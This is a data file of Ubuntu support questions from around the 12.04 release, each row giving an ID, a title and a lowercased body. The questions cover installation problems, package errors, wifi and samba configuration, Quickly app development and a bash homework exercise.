157050	the report belongs to a package that is not installed	i have gotten the error message `` the report belongs to a package that is not installed . '' generally i would just ignore that since seemingly there is no problem except i got a crash report and then i said to report the problem and then i get this . now , how can a package or program crash that is not even installed ? sounds a little paradox , is n't it ? what should i do with this ? why does this even come up ?
157055	install ubuntu from iso file using grub2	i have previous versions of ubuntu , which includes grub2 . i see on the internet that , grub2 can boot from iso file , so , i booted ubuntu from iso file , but whenever i tried to install , it gives an error that , `` the disk need to be unmounted first before install '' . my question is : how can i install ubuntu 12.04 from iso file using grub2 ?
157057	where do i direct download for 11.10/11.04 ?	i have downloaded the wubi for 12.04 , but here its showing downloading ubuntu-12.04-wubi-amd64.tar.xz ! why amd64 when i selected 32 bit for windows ? ? ? please provide me any source [ wubi ] to download ubuntu 11.10/11.04 that would be compatible to my windows xp .
157065	preseed-file with apt-proxy/approx	i 'm using approx as a apt proxy in our network . it 's still working . now i try to install 12.04 using a preseed file . this ist the section for the mirror : d-i mirror/country string manual d-i mirror/protocol string http d-i mirror/http/countries string manual d-i mirror/http/proxy string d-i mirror/http/hostname string tjener:9999 d-i mirror/http/directory string /ubuntu d-i mirror/suite string precise d-i mirror/udeb/suite string precise d-i mirror/udeb/components multiselect main , restricted where tjener is the server . but it 's not working . during installation http : //gb.archive.ubuntu.com/ubuntu is used . after installation in the source.list http : //archive.ubuntu.com/ubuntu is used . if i change gb.archive.ubuntu.com to tjener:9999 approx is used , so it 's working . the preseed settings work for 10.04 but not for 12.04 . can anybody help me . thank , you
157070	how to copy file around 11gb in size in ubuntu	i have big problem with my server . it is not starting the os . now i am using ubuntu by booting from the dvd to copy all data in the server . but , i can not copy one file which is around 11 gb . that file is very important . i believe i may be unable to copy this file because it is larger than 4.3 gb . how can i copy this big file ?
157071	pressing capslock will launch thunderbird	i 've been baffled about this for a while . i 've been trying to figure out why every time i press capslock key on my netbook ( of some obscure make ) keyboard ubuntu will not only toggle capslock key state but also launch thunderbird . do you have any idea how to fix this ? additional info : output of capslock keypress event ( requested by tom brossman ) keypress event , serial 54 , synthetic no , window 0x3800001 , root 0xaa , subw 0x0 , time 453152 , ( 14 , -13 ) , root : ( 715,38 ) , state 0x2 , keycode 163 ( keysym 0x1008ff19 , xf86mail ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false
157074	errors when trying to update using apt-get	i get errors when i try to install any software . the errors are reading package lists ... error ! e : could not open file /var/cache/apt/pkgcache.bin - open ( 22 : invalid argument ) e : failed to truncate file - ftruncate ( 9 : bad file descriptor ) e : the package lists or status file could not be parsed or opened . when i try to update a system with sudo apt-get update , i encounter other errors like w : failed to fetch http : //tz.archive.ubuntu.com/ubuntu/dists/precise-backports/main/binary-i386/packages 404 not found [ ip : 91 . 189 . 92 . 192 80 ] and many others . i am new to ubuntu .
157075	why does `` ps aux | grep x '' give better results than `` pgrep x '' ?	i 've just tried the following command on my ubuntu , it does n't show a thing : pgrep php5 should n't it return the process id of php5 ( which the following command just does ) ? : ps aux | grep php5 so , what 's the difference between these two commands ?
157076	netbeans cant call libraries in c++ since update to 12.04	i was hoping you can help me solve a problem i have . since i updated to 12.04 version of ubuntu i cant call libraries in c++ netbeans projects . i get this message in netbeans when i include library in c++ program : there are unresolved include inside < iostream > i have tried to uninstall netbeans so i can reinstall it but when i run uninstall.sh i get critical error message :
157077	youtube videos not available in rekonq	youtube videos are not working on my ubuntu 12.04 . most of the videos say `` video not available at this moment '' , but if you go to someones channel , it says `` undefinded '' but displays audio . browser is rekonq , but happens in every browser i have on ubuntu . help will be appreciated , thanks !
157081	how to set disk quota for multiple users within a single disk partition	i have a single disk partition ( say /shared ) shared by multiple users . it has a single file system ( ext3 ) . i want to put home directories for each of the user here and set their disk limit to 5 gb . thus /share/home/user1 could have up to 5 gb and /share/home/user2 have could have up to 5 gb . what is the command line way ( not gui ) to do this ?
157082	how do i configure chrome to use the system installed flash instead of the bundled one ?	i just updated to chrome 20.0.1132.43 which includes flash 11.3.31.109 . since that update most of the flash videos i watch online will randomly display erratic behavior ( skipping like a broken cd , `` fast forwarding '' at twice the frame rate with the audio being scrambled due to too fast playback , restarting every video after two seconds , fullscreen overlay being displayed but no image , fullscreen taking several seconds to actually show a picture , youtube player to go fullscreen but then hang in the controls fadeout animation with no picture -sound keeps playing ) . is there anything i can do to resolve or work around this ? i 'm using ubuntu 12.10 64bit and the latest nvidia-current drivers 295.40 on a geforce gt 440 . it used to work in previous versions of google chrome .
157085	what 's the difference between installing and trying ubuntu ?	i was wondering what the difference between running and trying ubuntu and i was also wondering if there was any downfall to running ubuntu on a usb drive .
157092	i ca n't install ubuntu 12.04 on my desktop	my desktop is about 2 years old . it has `` intel g41 chipset '' with `` intel core2duo processor '' , 4gb ddr2 ram . i want to install ubuntu 12.04 alongside windows 7 . i downloaded `` ubuntu-12.04-desktop-i386.iso '' file and burn it on to a cd . then i inserted in it on my drive and reboot my desktop . installation started , but after passing almost half an hour , installation stopped . it showed error lines like this : 2816.493003 end_request i/o error , dev sr0 , sector 1291668 when installation stopped , i re-inserted the cd and ran wubi.exe from windows , then tried `` help me boot from cd '' option , but after 3-4 mins , an error message popped up saying `` permission denied '' . i also tried the option described in here , but same messages show every time . what should i do to install ubuntu now ?
157093	unable to fully remove juju	after downloading juju and playing around with it a little bit , my curiosity is satisfied . i decided to move on to other endeavors and uninstall juju , although despite my best efforts a piece of juju lives on in my syslog ( on system boot ) : kernel : [ 16.509086 ] init : juju-jon-sample-file-storage main process ( 2163 ) terminated with status 1 kernel : [ 16.509113 ] init : juju-jon-sample-file-storage main process ended , respawning kernel : [ 16.680103 ] init : juju-jon-sample-file-storage main process ( 2164 ) terminated with status 1 kernel : [ 16.680138 ] init : juju-jon-sample-file-storage main process ended , respawning kernel : [ 16.873943 ] init : juju-jon-sample-file-storage main process ( 2165 ) terminated with status 1 kernel : [ 16.873965 ] init : juju-jon-sample-file-storage respawning too fast , stopped ... actual number is much greater , but you get the idea , also present is the identical errors replaced with juju-jon-sample-machine-agent . i tried sudo apt-get remove juju sudo apt-get purge juju sudo apt-get autoremove and sudo update-rc.d juju remove sudo update-rc.d juju-jon-sample-machine-agent remove sudo update-rc.d juju-jon-sample-file-storage remove any ideas how to remove my that last piece of juju stuck to my syslog ? i am running 12.04 64 bit . thanks in advance .
157094	why it is n't possible to type in urls in the hud ?	with the ubuntu 's hud you should be able to work faster . but with firefox it 's not always the case . if i type in an url nothing happens ... so why it is n't possible to use urls in the hud ? ... how can i integrate firefox 's awesome bar into the ubuntu 's hud ?
157096	how to install a driver for hp laserjet p1102 printer ?	good morning , i have a hp laserjet p1102 printer , that i could not install on ubuntu 10.04 despite all my efforts . what can i do ? mfg guten morgen , ich habe einen drucker von hp laserjet p1102 den ich bein besten willen an ubuntu vers 10.04 nichtzum laufen bekomme . was kann ich t ? mfg
157098	help with bash script with text	i 'm new in bash scripting and need help with the following please : the purpose of this homework is to let students write programs in bash scripting language that enable them to manipulate data in a text file similarly to a database table.. students should understand the table structure and write the programs check_table , row_select and row_delete using bash scripting language . table structure a table consists of a text file that contains lines . the first line contains information about the table and each of the rest of lines represents a data row . the first line structure is as follows : table_name : number_of_rows : number_of_fields : fieldname1 , fieldname2 , filedname3 ... etc table_name is an alphanumeric string not exceeding 16 characters and does not include the column character ‘ : ’ nor the space character ‘ ‘ . it must be the same as the file name . number_of_rows is a integer with value less than 1000. number_of_fields is a integer with value less than 10. filedname is an alphanumeric string not exceeding 16 characters and not including the space ‘ ‘ nor the comma ‘ , ’ characters . each data row consists of a series of fields delimited by the comma character’ , ’ . each row has exactly the same number of fields as all other fields in the table . a field consists of a string of alphanumeric characters , does not exceed 16 characters and does not contain the space character ‘ ‘ nor the comma character ‘ , ’ . example : students_info:3:5 : std_1st_name , std_last_name , year_ of_birth , sex , program amer , salim,1990 , m , bit samira , rami,1988 , f , ise lamia , rida,1990 , f , ise programs 1.check_table syntax : check_table < table_name > description : the program checks the following in order : command syntax table exists . first line syntax is correct . tablename and fieldnames all have correct lengths . table has correct number of rows . all rows have correct number of fields . output : table is good table has a a problem problem description ( first problem encountered ) example : $ check_table students_info table students_info is good $ check_table student_info1 table students_info has at least one problem : actual number of rows not equal to the one in the file header . i need some guide about this . thanks in advance .
157100	how to prevent ssh setting lang to an non-existent locale when logging in ?	i have a minimal server install that only has english locales . that works great on its own , but when i log in from my mac , lang is set to da_dk.utf-8 . that causes a lot of error messages around the system , as the said locale does not exists . is there a way to prevent ssh from setting invalid values , or will preventing ssh from setting these altogether have a negative impact on my system ?
157101	python3 can participate to ubuntu app showdown ?	my application works only with python3 and it use qt , can i participate to ubuntu application showdown ? right now i do n't know how to create the package ... quickly does n't work with python3
157108	how do i add a daemon to my quickly application ?	i am building a app with quickly , and i wanted to add a daemon that will run in the background . how do you do this ?
157110	can not execute shell /bin/zsh when execute a shell command in vi	i use bash . but it can not find zsh . how to change this ? ps : i do n't want to install zsh .
157116	upon booting , wifi wo n't work until disabled and re-enabled	after booting ubuntu 12.04 64 bit , i am not able to connect to wifi , until i disconnect and reconnect . this has been happening for a while but i am finally getting tired of reconnecting after a boot , so im trying to fix it . in my efforts to troubleshoot here is what i have so far : when wifi is not working i can not ping local network addresses i get the same behavior logged in as a different user changing ipv6 settings to `` ignore '' has no effect , despite ipv6 configure timeout ( see log below ) . here is what i get from grep network /var/log/syslog when the wifi is not working : networkmanager [ 1132 ] : < info > ( wlan0 ) : using nl80211 for wifi device control networkmanager [ 1132 ] : < info > ( wlan0 ) : new 802.11 wifi device ( driver : 'iwlwifi ' ifindex : 3 ) networkmanager [ 1132 ] : < info > ( wlan0 ) : exported as /org/freedesktop/networkmanager/devices/1 networkmanager [ 1132 ] : < info > ( wlan0 ) : now managed networkmanager [ 1132 ] : < info > ( wlan0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] networkmanager [ 1132 ] : < info > ( wlan0 ) : bringing up device . networkmanager [ 1132 ] : < info > ( wlan0 ) : preparing device . networkmanager [ 1132 ] : < info > ( wlan0 ) : deactivating device ( reason 'managed ' ) [ 2 ] networkmanager [ 1132 ] : < warn > /sys/devices/virtual/net/lxcbr0 : could n't determine device driver ; ignoring ... networkmanager [ 1132 ] : < info > wpa_supplicant started networkmanager [ 1132 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/lxcbr0 , iface : lxcbr0 ) networkmanager [ 1132 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/lxcbr0 , iface : lxcbr0 ) : no ifupdown configuration found . networkmanager [ 1132 ] : < warn > /sys/devices/virtual/net/lxcbr0 : could n't determine device driver ; ignoring ... networkmanager [ 1132 ] : < info > ( wlan0 ) : supplicant interface state : starting - > ready networkmanager [ 1132 ] : < info > ( wlan0 ) : device state change : unavailable - > disconnected ( reason 'supplicant-available ' ) [ 20 30 42 ] networkmanager [ 1132 ] : < info > ( wlan0 ) : supplicant interface state : ready - > inactive networkmanager [ 1132 ] : < warn > trying to remove a non-existant call id . networkmanager [ 1132 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/virbr0 , iface : virbr0 ) networkmanager [ 1132 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/virbr0 , iface : virbr0 ) : no ifupdown configuration found . networkmanager [ 1132 ] : < warn > /sys/devices/virtual/net/virbr0 : could n't determine device driver ; ignoring ... networkmanager [ 1132 ] : < info > auto-activating connection 'skylab ' . networkmanager [ 1132 ] : < info > activation ( wlan0 ) starting connection 'skylab' networkmanager [ 1132 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... networkmanager [ 1132 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] networkmanager [ 1132 ] : < info > activation ( wlan0/wireless ) : connection 'skylab ' has security , and secrets exist . no new secrets needed . networkmanager [ 1132 ] : < info > config : added 'ssid ' value 'skylab' networkmanager [ 1132 ] : < info > config : added 'scan_ssid ' value '1' networkmanager [ 1132 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' networkmanager [ 1132 ] : < info > config : added 'psk ' value ' < omitted > ' networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . networkmanager [ 1132 ] : < info > config : set interface ap_scan to 1 networkmanager [ 1132 ] : < info > ( wlan0 ) : supplicant interface state : inactive - > scanning networkmanager [ 1132 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > associating networkmanager [ 1132 ] : < info > ( wlan0 ) : supplicant interface state : associating - > associated networkmanager [ 1132 ] : < info > ( wlan0 ) : supplicant interface state : associated - > 4-way handshake networkmanager [ 1132 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > completed networkmanager [ 1132 ] : < info > activation ( wlan0/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'skylab ' . networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) scheduled . networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) started ... networkmanager [ 1132 ] : < info > ( wlan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] networkmanager [ 1132 ] : < info > activation ( wlan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) networkmanager [ 1132 ] : < info > dhclient started with pid 2157 networkmanager [ 1132 ] : < info > activation ( wlan0 ) beginning ip6 addrconf . networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) complete . networkmanager [ 1132 ] : < info > ( wlan0 ) : dhcpv4 state changed nbi - > preinit networkmanager [ 1132 ] : < info > ( wlan0 ) : dhcpv4 state changed preinit - > reboot networkmanager [ 1132 ] : < info > address 192.168.2.9 networkmanager [ 1132 ] : < info > prefix 24 ( 255.255.255.0 ) networkmanager [ 1132 ] : < info > gateway 192.168.2.1 networkmanager [ 1132 ] : < info > nameserver '192.168.2.1' networkmanager [ 1132 ] : < info > domain name 'belkin' networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 commit ) started ... networkmanager [ 1132 ] : < info > dns : starting dnsmasq ... networkmanager [ 1132 ] : < info > ( wlan0 ) : writing resolv.conf to /sbin/resolvconf networkmanager [ 1132 ] : < info > ( wlan0 ) : device state change : ip-config - > activated ( reason 'none ' ) [ 70 100 0 ] networkmanager [ 1132 ] : < info > policy set 'skylab ' ( wlan0 ) as default for ipv4 routing and dns . networkmanager [ 1132 ] : < info > activation ( wlan0 ) successful , device activated . networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 commit ) complete . networkmanager [ 1132 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . the rest is only present when wifi is not working : networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 commit ) started ... networkmanager [ 1132 ] : < info > dns : starting dnsmasq ... networkmanager [ 1132 ] : < info > ( wlan0 ) : writing resolv.conf to /sbin/resolvconf networkmanager [ 1132 ] : < info > ( wlan0 ) : device state change : ip-config - > activated ( reason 'none ' ) [ 70 100 0 ] networkmanager [ 1132 ] : < info > policy set 'skylab ' ( wlan0 ) as default for ipv4 routing and dns . networkmanager [ 1132 ] : < info > activation ( wlan0 ) successful , device activated . networkmanager [ 1132 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 commit ) complete . here is the info on my wireless card from lspci -v : 08:00.0 network controller : intel corporation centrino wireless-n 1000 subsystem : intel corporation centrino wireless-n 1000 bgn flags : bus master , fast devsel , latency 0 , irq 44 memory at d1d00000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : [ c8 ] power management version 3 capabilities : [ d0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ e0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number 74-e5-0b-ff-ff-7d-3a-38 kernel driver in use : iwlwifi kernel modules : iwlwifi not sure where to go with this , any help is appreciated , including tips on troubleshooting . thanks in advance .
157117	ubuntu app showdown : commercial applications	me and a few of my friends decided to create a game for the app showdown . however , we wanted to make a commercial game out of it ( for < 5 $ ) . so the question is : if i want to submit a commercial app , what exactly do i have to do ? we would be willing to provide it as open source software but want to sell it in usc anyway . how should i submit the app if we can do that ? ( note : we would only open source if it 's required , but would prefer to only share the source with the judges . is that also possible ? ) . also : if i have to upload the source code to the ppa and let it build by ubuntu 's build service : how do i do that with mono-apps ? it worked perfectly for other projects where i had cmakefiles and stuff like that . but for mono , i only have a monodevelop project file - how to do that right ? thanks
157123	ambiance theme text stays black -	i have used jono bacons creating your first ubuntu application to discover how to theme toolbars using the ubuntu theme . i followed the exact same code and the program loads with a black toolbar , however the text on the buttons does not change colour and stays black . this is an image of my apps issue : jono 's text colour however turns white when the style is changed . this is the code i have used : self.maintoolbar = self.builder.get_object ( `` maintoolbar '' ) maintoolbarstyle = self.maintoolbar.get_style_context ( ) maintoolbarstyle.add_class ( gtk.style_class_primary_toolbar ) i have been tearing my hair out over this and i 'm sure there is an easy solution . thanks very much for any help you can give ! andrew
157125	with wrong pam_environment unable to login	i made some mistakes in my ~/.pam_environment file ; the changes caused a login failure . i can not log in to my system . i only have one super account . i tried to press ctrl-alt-f1 to enter into full screen login mode , however i still could n't login . can anybody help ?
157128	proper fstab entry to mount a samba share on boot ?	i am a little confused on the proper fstab entry for a samba share in ubuntu 12.04 i can get the drive to mount manually by using : sudo mount -t cifs //192.168.2.2/raid_drive /mnt/homeserver -o username=jon , password=password so i tried putting this in fstab : //192.168.2.2/raid_drive /mnt/homeserver cifs username=jon , password=password , iocharset=utf8 , mode=0777 , dir_mode=07ââ77 0 0 which gives me this error in syslog : kernel : [ 2217.925354 ] cifs : unknown mount option mode kernel : [ 2217.936345 ] cifs vfs : default security mechanism requested . the default security mechanism will be upgraded from ntlm to ntlmv2 in kernel release 3.3 this guide says to use smbfs although i believe smbfs is deprecated ? what is a common fstab configuration for a samba share in ubuntu 12.04 ? edit : using the accepted answer below i was initially getting this error message ( from dmesg ) : [ 45.520883 ] cifs vfs : error connecting to socket . aborting operation [ 45.520990 ] cifs vfs : cifs_mount failed w/return code = -115 although it turns out this was due to network connectivity issues , and not related to improper fstab entry .
157131	opening a window within an already open window ( quickly/glade )	i have a question regarding window and button implementation . if i have a toolbar set up , and i have a button on it , is it possible to get it to open a window right within the program ? i mean like open up a different section of the program much like the function , notepad1 , would do ? or could i get it to imitate the behavior of what the system settings do , where it opens a window completely within the same window ? if you can help , i appreciate it . i 'm working with the default glade file if that helps anyone .
157133	login screen - set default user	on login screen i have two options : my default user ( let 's say user1 ) and `` other user '' . when i work as `` other user '' and make `` log out '' , on logon screen the 'active ' one is `` other user '' . i wish that after every log out/reboot/start the active one is my default user . is it possible to set default user on login screen ? thx for help in advance . regards , a
157134	how to hide the mouse cursor	i 'm building a kiosk using ubuntu precise on a touch screen . now i 'm looking for the appropriate way to make the mouse cursor disappear . as people know where they are pointing , displaying an arrow under their finger is useless , and having an arrow where they last pointed even more so . my best bet would be some kind of cursor theme consisting only of transparent cursors . i 'm a bit surprised to find no ui to switch and maybe install cursor themes in the default unity ui , but as i wo n't be using unity , that 's not much of a problem . it appears that the alternatives listed in update-alternatives -- list x-cursor-theme all refer to .theme files , so i searched the package list for those . the resulting list does not list any likely candidates , i.e . no packages containing “invisible” or “transparent” in their name . so far , some googled result yielding a readme for “xcursor transparent theme” is my best bet . that would mean compiling those sources myself , perhaps putting them into my ppa . i 'm also a bit sceptical about that result as said readme is dated from 2003 . and i 'm not sure that i 'm not making things overly complicated . after all , there is quite some support in precise for touch devices , so i do n't believe i 'm the first one who wants to get rid of his mouse cursor . is there another way which does n't involve user-compiled binary code ? is there a theme package for transparent cursors which i 've overlooked ? is there some other mechanism to make the cursor disappear without changing the cursor theme ? i 'll be using matchbox wm , firefox and java applets , so i 'll be happy with any solution working under such a setup . i 'm not interested in any solutions twiddling with gnome or compiz , as i 'll not be running either .
157137	can i repair a corrupted ubuntu iso file ?	i have downloaded ubuntu 12.04 desktop lts ( 701 mb ) . i tried it in linux live usb creator . after adding this file , it shows that it is a corrupted file . but i did n't get any error while extracting it to the usb stick . i got error while installing . it shows `` error 5 input/output '' . please tell me how to fix the corrupted file . i can not download it again , because it took 3 days to download for my system .
157139	how to remove showing the shortcuts ?	this is all great stuff ... . esential for some . but some of us also need not have to show these shortcuts while pressing a particular key . is there a way to do that ? please note that i am not arguing against how useful all this is . just would like to know how to unset this option when need it . thanks
157144	i want to install windows 7 with ubuntu 12.04 without losing data .	i want to install windows 7 on a machine where i have already ubuntu 12.04 installed , because i need visual studio 2010 , which ca n't be installed in ubuntu . i want to install windows 7 in a way that , i do n't lose any data on ubuntu . how can i do this ?
157147	does there exist a cli spaced repetition program ?	i 'm aware of anki and mnemosyne , but not of any way to get them to run in a terminal .
157150	gui does n't start in vmware	i am trying to install ubuntu 12.04 in a virtual machine . it installed correctly but the problem is that the graphical user interface ( gui ) does not start . i only get the command prompt where i can login . any advice how i can get the gui in vmware ?
157154	how do i include lines in resolv.conf that wo n't get lost on reboot ?	i have finally migrated to 12.04 from 7.10 . i have one last part to complete but i am stumped . i am using puppet on each server , and in the past i have included a nameserver address and a search domain name for the puppetmaster in resolv.conf . search puppetmaster.com nameserver 192.168.1.xxx in 12.04 resolv.conf gets overwritten when rebooted . i can not use a static ip for these , so using the /etc/network/interfaces to help me out is a nill point . # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 is there a way to get resolvconf to handle this either in the head , tail or base ? if there is , are there any examples i can use to tweak on my server . any help is much appreciated .
157160	machine check error while booting from usb	i put the last ubuntu iso on my usb stick using unetbootin , after formatting it to fat32 . i 've already done that before with other operating systems and it worked . i ca n't actually boot ubuntu from usb since i get a black screen with the error `` machine check error '' on top the an automatic reboot happens . the error appears right after the boot , i ca n't see anything else before . i 'm using my asus k53sv latop . does anybody know how to solve this ?
157161	nvidia drivers multiple launchers	i have recently changed a video card in my machine running precise to geforce and tried running it with native nvidia driver . now i have a problem because i have 2 monitors 22 '' wide and 19 '' vga connected to the system and i have to use xinerama with 2 independent monitors instead of twinview . because of that i have 2 launchers ( 1 on each screen ) . is there a way to make sure that only 1 launcher is started ?
157164	how to change unity launcher auto-*hide* delay ?	is there anyway to change the delay before the launcher hides ? i know it 's possible to make the launcher appear quickly , but i ca n't figure out anyway to make it disappear without the 1-second delay .
157168	can i get gnome-shell 's drop-down menus in unity ?	just a quick question , in gnome-shell you get those little white menus that drop down from the title of the application but in unity you have it as a separate window . is there any way to get those drop down menus in unity ? i much prefer the look of them over the separate windows .
157170	internet good but update manager not good	i am using ubuntu 12.04 . i am doing internet with a usb modem of 236kbps . my issue is that if i am accessing a web page through a browser it works , but if i am doing sudo apt-get update in a terminal , there is no response . please help me to solve this . one more thing ; i am unable to change my dns settings . raja @ badfox : ~ $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 220.226.100.40 nameserver 220.226.6.104 nameserver 127.0.0.1 i want to replace these addresses with ones linked here http : //www.cyberciti.biz/faq/free-dns-server/ . see the picture to have some idea about my issue .
157173	ca n't load windows without plugging in the external drive	my external drive contains ubuntu and when i do n't have it plugged in , i receive an error message with this grub_rescue > . i do n't know what this means or how to fix it , but i want to make it as such that , windows will load without using the ubuntu 's bootloader screen . this started happening when i updated to the latest version of ubuntu . edit : the error i am getting when i do n't have my external plugged in is 6e3b2d2e-84f4-45b69a81-2279cf411ea and the german message i got was drucken sie eine beliebige taste , um non cd oder dvd zy starten ... .. also i tried the command sudo blkid and rebooted without the external unplugged but still got the same error .
157176	how to reenable unity 3d after installing bumblebee ?	i installed bumblebee to solve nvidia/intel driver problem . it does work well , but it also disabled unity 3d . how can i get my unity 3d back ?
157178	how to reference to .desktop file ? ( installed in /opt ) in a dynamic quicklist ?	i 'm trying to create a dynamic quicklist for an application i 'm developing in quickly . this is the line of code i use to try and connect to the .desktop file : self.launcher = unity.launcherentry.get_for_desktop_id ( `` my-app.desktop '' ) for testing purposes , i 've found that when using quickly run i should copy the .desktop file to ~/.local/share/applications . when i do this , the quicklist shows up correctly . however , when packaging my app using quickly package -- extras , and installing this package , i get a launcher without quicklist . does this have something to do with my app being installed in /opt ? meaning my desktop file is located somewhere else ? should i use another reference to the desktop file ? edit : i 've tried to find the .desktop file . but i ca n't seem to locate it.. does this mean i should generate one myself ? and that i should link to that file ?
157180	how to connect to the internet via command line or graphical utility given i ca n't click at the top of the screen ?	my ubuntu 12.04 installation has an input problem resulting preventing me from clicking near the top of the screen . that is , there is an unclickable area , circa 60 pixels high and stretching all the way across the screen . i will ask about this in a later question . for now , i would just like to be able to connect to the internet , given this limitation . i am able to access the network connections application by hitting the super key and typing `` network connections '' . there is a lan and a wireless network available . the network icon in the bar at the top of the screen shows an empty wedge , which i suppose means that wireless is off . i 've attached the cable for the ethernet connection , but it does not seem to have connected automatically . how can i figure out what 's going on ? ( i 'll happily edit in the output of any relevant terminal commands . ) thank you . edited to add command outputs : ben @ ben-laptop : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:1e:68 : cb : cc:3e inet addr:192.168.1.10 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21e:68ff : fecb : cc3e/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:712 errors:0 dropped:0 overruns:0 frame:0 tx packets:5243 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:144145 ( 144.1 kb ) tx bytes:267015 ( 267.0 kb ) interrupt:48 base address:0x4000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:4464 errors:0 dropped:0 overruns:0 frame:0 tx packets:4464 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:391786 ( 391.7 kb ) tx bytes:391786 ( 391.7 kb ) wlan0 link encap : ethernet hwaddr 00:16 : ea : bd:5a:5a inet addr:192.168.1.10 bcast:192.168.1.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) ben @ ben-laptop : ~ $ lspci | grep -i 'network' 02:00.0 network controller : intel corporation pro/wireless 5100 agn [ shiloh ] network connection ben @ ben-laptop : ~ $ ping -c 5 www.google.com ping : unknown host www.google.com the wireless network seems to be available : ben @ ben-laptop : ~ $ sudo iwlist scan [ sudo ] password for ben : lo interface does n't support scanning . vboxnet0 interface does n't support scanning . wlan0 scan completed : cell 01 - address : 00:01:3b : ae:38:9a channel:6 frequency:2.437 ghz ( channel 6 ) quality=27/70 signal level=-83 dbm encryption key : on essid : '' bthub3-xpmm '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000133c5ccc08 extra : last beacon : 3020ms ago ie : unknown : 000b4254487562332d58504d4d ie : unknown : 010882848b960c121824 ie : unknown : 030106 ie : unknown : 2a0100 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 32043048606c ie : unknown : 2d1aac011bffff000000000000000000000000000000000000000000 ie : unknown : 3d1606080000000000000000000000000000000000000000 ie : unknown : 4a0e14000a002c01c800140005001900 ie : unknown : 7f0101 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f20201018c0003a4000027a4000042435e0062322f00 ie : unknown : dd1e00904c33ac011bffff000000000000000000000000000000000000000000 ie : unknown : dd1a00904c3406080000000000000000000000000000000000000000 ie : unknown : dd0900037f01010000ff7f eth0 interface does n't support scanning . final note : i restarted the system and the internet appears to work , via wifi , so the problem is solved , for now .
157184	will windows 7 remote desktop client connect to 12.04 server ?	what , if any , versions of windows rdp will connect to ubuntu server 12.04 lts 64bit ?
